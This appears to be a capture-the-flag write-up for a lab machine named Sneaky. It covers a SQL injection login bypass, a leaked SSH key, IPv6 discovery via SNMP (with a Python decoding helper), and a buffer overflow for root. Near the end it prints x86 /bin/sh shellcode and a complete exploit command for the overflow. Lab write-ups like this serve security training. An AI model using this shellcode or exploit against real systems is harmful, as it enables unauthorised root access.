Sneaky - 10.10.10.20
Target Enumeration:
IP: 10.10.10.20
User: 9fe14f76222db23a770f20136751bdab
Root: See screenshot
Ports / Services / Software Versions Running
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
Vulnerability Exploited:
SQLi authentication bypass
User's SSH key stored on the webserver.
Privilege Escalation:
/usr/local/bin/chal is vulnerable to a buffer overflow
Exploiting the host:
Nmap
Dirb:
/dev is a login page
Intercept the login request and fuzz for SQL injection with Burp Intruder:
You can bypass the login with an SQLi payload
Request in browser and download the key
Key contents
There is no SSH port open, so we need to find the IPv6 address.
Check our IPv6 address
Snmpwalk with the public community string gives lots of information:
Find the IPv6 info
Convert from decimal to hex
iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248
254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248
Convert to hex with python:
Build the address based on the same format
Dead:beef::250:56ff:feb2:8ef8
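As an added example (not part of the original write-up), the decimal-to-hex step done programmatically: the trailing index of an ipAddressTable OID is addrType.addrLength.octets, so the 16 octets from the snmpwalk line above decode to the link-local fe80:: address, and the write-up's dead:beef::/64 prefix (assumed here to be the lab prefix) is then placed in front of the same 64-bit interface identifier. The sample OID is the one quoted above.

```python
import ipaddress

# Constructed sample: the snmpwalk OID from the write-up. The ipAddressTable
# (1.3.6.1.2.1.4.34.1) is indexed by InetAddressType . length . address octets.
SAMPLE_OID = "iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248"

# InetAddressType values (RFC 4001): 2 = ipv6 (16 octets), 1 = ipv4 (4 octets).
# Longest length first so the 16-octet case is tried before the 4-octet one.
ADDR_LENGTHS = {2: 16, 1: 4}


def parse_ipaddresstable_oid(oid: str):
    """Decode the IP address encoded at the end of an ipAddressTable OID.

    Returns an IPv4Address/IPv6Address, or None if the OID tail does not look
    like <type>.<length>.<octets> with a matching type/length pair.
    """
    parts = [int(p) for p in oid.replace("iso", "1").split(".")]
    for addr_type, length in ADDR_LENGTHS.items():
        if len(parts) < length + 2:
            continue
        type_pos = -(length + 2)
        if parts[type_pos] == addr_type and parts[type_pos + 1] == length:
            octets = parts[type_pos + 2:]
            if all(0 <= o <= 255 for o in octets):
                # ipaddress accepts the packed 4/16-byte form directly
                return ipaddress.ip_address(bytes(octets))
    return None


def with_prefix(addr: ipaddress.IPv6Address, prefix: str) -> ipaddress.IPv6Address:
    """Keep the low 64 bits (interface identifier) of addr behind a new /64 prefix."""
    iid = int(addr) & ((1 << 64) - 1)
    net = ipaddress.IPv6Network(prefix, strict=False)
    return ipaddress.IPv6Address(int(net.network_address) | iid)


if __name__ == "__main__":
    link_local = parse_ipaddresstable_oid(SAMPLE_OID)
    print(link_local)                                # fe80::250:56ff:feb2:8ef8
    print(with_prefix(link_local, "dead:beef::/64"))  # dead:beef::250:56ff:feb2:8ef8
```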
Log in over IPv6 with ssh -6, the username and the key
Search for privesc
Running the file shows it could be vulnerable to a buffer overflow
Check you can overwrite:
Generate a pattern to locate offset
Dump that into the program
Query the offset
Found the offset
Build the overflow using /bin/sh as shellcode
```
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
```
You will need to try various memory addresses to get this to work:
Open gdb and find the memory addresses:
```
(gdb) run AAAAAAAAAAAAAAAAAA-SNIP-AAAAAAA
```
Convert address to little endian
Build your payload as follows:
```
/usr/local/bin/chal $(python -c 'print "A"*362+"\xbe\xf4\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')
```
Now you have a root shell, so collect the flags.